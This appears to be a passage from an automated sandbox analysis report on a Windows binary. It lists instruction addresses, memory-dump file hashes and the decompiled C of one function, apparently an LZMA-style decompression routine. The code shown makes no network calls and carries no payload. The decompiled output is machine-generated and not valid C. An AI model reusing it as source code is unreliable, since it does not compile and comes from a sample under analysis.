                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00000000
                                            0x00406f56
                                            0x00406f54
                                            0x00407189
                                            0x00000000
                                            0x00000000
                                            0x004067b8

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                            • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                                            • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                            • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                            0x00406786
                                            0x0040678d
                                            0x00406793
                                            0x00406799
                                            0x00000000
                                            0x0040679d
                                            0x004067a9
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x00000000
                                            0x004067bf
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d4
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
